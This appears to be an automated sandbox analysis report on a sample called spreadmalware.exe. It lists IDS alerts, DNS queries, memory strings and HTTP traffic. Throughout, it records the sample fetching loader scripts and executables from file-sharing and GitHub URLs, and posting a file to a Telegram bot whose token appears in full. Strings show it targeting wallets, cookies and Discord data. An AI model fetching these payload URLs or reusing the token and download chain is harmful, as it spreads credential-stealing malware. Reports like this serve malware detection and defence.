Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50010 version: TLS 1.2

Source: spreadmalware.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: powershell.pdbUGP source: DisplayDriverUpdater.exe, 0000005D.00000000.1866745874.00007FF62A59A000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: powershell.pdb source: DisplayDriverUpdater.exe, 0000005D.00000000.1866745874.00007FF62A59A000.00000002.00000001.01000000.00000015.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Directory queried: number of queries: 1105

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50010 -> 149.154.167.220:443

Found Tor onion address

Source: powershell.exe, 00000029.00000002.2054332439.0000016D2B29F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: m=nil base , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnet.local.onionip+netreturnrdtscppopcntcmd/goempty rune1 gmtimestrtodheaderAnswerLengthSTREETtznameavx512rdrandrdseed/createONLOGONHIGHESTAPPDATAAppDatanumber (PANIC=booleanbdoUxXvintegercomplexfloat32float64readdir (trap consolePATHEXT\\.\UNCleveldbBitcoinwalletsCoinomiIridiumOperaGXVivaldiEnkryptPhantomSafePal%s (%s)RoamingFeatherBadlionUbisoftdiscordDiscord.purpleElementViberPCcookiesUpgradeTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTOpenVPNabortedCopySidWSARecvWSASendconnectsignal FreeSidSleepExinvaliduintptrSwapperChanDir Value>i < lenConvert19531259765625AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhuta:eventsTuesdayJanuaryOctoberMUI_StdMUI_DltforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN, goid= s=nil
Source: powershell.exe, 00000029.00000002.2243470696.0000017533A00000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: m=nil base , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnet.local.onionip+netreturnrdtscppopcntcmd/goempty rune1 gmtimestrtodheaderAnswerLengthSTREETtznameavx512rdrandrdseed/createONLOGONHIGHESTAPPDATAAppDatanumber (PANIC=booleanbdoUxXvintegercomplexfloat32float64readdir (trap consolePATHEXT\\.\UNCleveldbBitcoinwalletsCoinomiIridiumOperaGXVivaldiEnkryptPhantomSafePal%s (%s)RoamingFeatherBadlionUbisoftdiscordDiscord.purpleElementViberPCcookiesUpgradeTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTOpenVPNabortedCopySidWSARecvWSASendconnectsignal FreeSidSleepExinvaliduintptrSwapperChanDir Value>i < lenConvert19531259765625AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhuta:eventsTuesdayJanuaryOctoberMUI_StdMUI_DltforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN, goid= s=nil
Source: powershell.exe, 00000029.00000002.2054332439.0000016D2B7E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: m=nil base , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnet.local.onionip+netreturnrdtscppopcntcmd/goempty rune1 gmtimestrtodheaderAnswerLengthSTREETtznameavx512rdrandrdseed/createONLOGONHIGHESTAPPDATAAppDatanumber (PANIC=booleanbdoUxXvintegercomplexfloat32float64readdir (trap consolePATHEXT\\.\UNCleveldbBitcoinwalletsCoinomiIridiumOperaGXVivaldiEnkryptPhantomSafePal%s (%s)RoamingFeatherBadlionUbisoftdiscordDiscord.purpleElementViberPCcookiesUpgradeTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTOpenVPNabortedCopySidWSARecvWSASendconnectsignal FreeSidSleepExinvaliduintptrSwapperChanDir Value>i < lenConvert19531259765625AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhuta:eventsTuesdayJanuaryOctoberMUI_StdMUI_DltforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN, goid= s=nil

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match

File source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.7:50008 -> 147.185.221.24:59098

Source: global traffic	HTTP traffic detected: GET /file/13a37f52caaf958b/serverrefsvc.exe HTTP/1.1Host: anonsharing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0de41850bb5ec93884b730d3cb871a169aeb HTTP/1.1Host: anonsharing.com
Source: global traffic	HTTP traffic detected: GET /43a1723/test/refs/heads/main/Mewing HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/refs/heads/main/shellcode/loaderclient.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/refs/heads/main/Mewing HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/refs/heads/main/shellcode/loaderclient.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/main/Ip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7487418347:AAHo0dKeo0c-nZAiN9ZgiVPbyp4xTSdsV2E/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e1da44c9-2b1d-45a4-a865-297d217ee111"Host: api.telegram.orgContent-Length: 1212Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 147.185.221.24 147.185.221.24

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49702 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49701 -> 178.159.12.230:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49705 -> 38.143.146.102:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49795 -> 185.199.110.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49869 -> 185.199.111.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49849 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49859 -> 185.199.110.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49855 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49875 -> 185.199.111.133:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49875 -> 185.199.111.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49856 -> 185.199.111.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49863 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49863 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49945 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49948 -> 185.199.111.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49939 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49963 -> 185.199.111.133:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49963 -> 185.199.111.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49955 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49955 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49952 -> 185.199.111.133:443

Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /file/13a37f52caaf958b/serverrefsvc.exe HTTP/1.1Host: anonsharing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0de41850bb5ec93884b730d3cb871a169aeb HTTP/1.1Host: anonsharing.com
Source: global traffic	HTTP traffic detected: GET /raw/msdcgy3bxg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastejustit.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file/db59849be6b5f562/skibiditoilet.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: anonsharing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /db59849be6b5f562/skibiditoilet.bat?download_token=a1e8551a275440a5e4f080f8e9763eec660cff556b920932c8cd94522d789e26 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: anonsharing.comCookie: filehosting=303b8e278dd1a3280483dd9d259be568
Source: global traffic	HTTP traffic detected: GET /anonsharing/b8/b8b4bfebdfac1d66be5d3c75dd4a06cf?response-content-disposition=filename%3Dskibiditoilet.bat&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HSRJ9W5CR8WH0842044I%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091510Z&X-Amz-SignedHeaders=host&X-Amz-Expires=10800&X-Amz-Signature=7c5db048caa31fbc29f2feb87c269054c605425e0927bffd5a06dd9b15d3b352 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: s3.ca-central-1.wasabisys.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/main/download.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/refs/heads/main/Mewing HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/refs/heads/main/shellcode/loaderclient.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091533Z&X-Amz-Expires=300&X-Amz-Signature=71849342e45026ae948e7cc8f90ab3779bcd14dee0966a571aa2cf9824444811&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/releases/download/siu/lmaoxclient HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/main/download.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.com
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/805647875/b2a5a7dc-5521-4d20-afaf-8cef231516e5?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091534Z&X-Amz-Expires=300&X-Amz-Signature=9fdf61ee1f5b4e28977c1309ad3394caf7c66405c5945baf7eacf935f35496e5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dlmaoxclient&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091535Z&X-Amz-Expires=300&X-Amz-Signature=d56a35e8a02c4927d06631767194b22bca897731c61334d3f71d41626b4986d9&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /43a1723/test/refs/heads/main/Mewing HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/refs/heads/main/shellcode/loaderclient.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /43a1723/test/releases/download/siu/lmaoxclient HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091533Z&X-Amz-Expires=300&X-Amz-Signature=71849342e45026ae948e7cc8f90ab3779bcd14dee0966a571aa2cf9824444811&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/805647875/b2a5a7dc-5521-4d20-afaf-8cef231516e5?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091534Z&X-Amz-Expires=300&X-Amz-Signature=9fdf61ee1f5b4e28977c1309ad3394caf7c66405c5945baf7eacf935f35496e5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dlmaoxclient&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.com
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091535Z&X-Amz-Expires=300&X-Amz-Signature=d56a35e8a02c4927d06631767194b22bca897731c61334d3f71d41626b4986d9&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /43a1723/test/main/Ip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: anonsharing.com
Source: global traffic	DNS traffic detected: DNS query: s3.ca-central-1.wasabisys.com
Source: global traffic	DNS traffic detected: DNS query: pastejustit.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: sigma.dreamhosters.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: sigma.dreamhosters.comUser-Agent: Go-http-client/1.1Content-Length: 949Content-Type: multipart/form-data; boundary=a429db8ba6e209a67f5b6c6a167b81348539cf69a659139c87a73ec1b88aAccept-Encoding: gzip

Source: spreadmalware.exe, 00000001.00000002.1292529153.00000000029E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anonsharing.com
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca-central-1.wasabisys.com
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B7AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200BC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: powershell.exe, 00000029.00000002.1870747846.000000C00017E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://localhost:9222taskkill.jsC:
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1BAA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B7FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200C25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://objects.githubusercontent.com
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000033.00000002.1811615016.000002B200AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s3.ca-central-1.wasabisys.com
Source: powershell.exe, 0000002E.00000002.1647029788.000002DE016C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: spreadmalware.exe, 00000001.00000002.1292529153.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1647029788.000002DE01491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B20003F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000002E.00000002.1647029788.000002DE016C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1647029788.000002DE01491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200063000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B20003F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anonsharing.com
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anonsharing.com(
Source: spreadmalware.exe, 00000001.00000002.1292529153.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.0000000002A03000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.0000000002A07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0
Source: spreadmalware.exe, 00000001.00000002.1292529153.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anonsharing.com/file/13a37f52caaf958b/serverrefsvc.exe
Source: powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
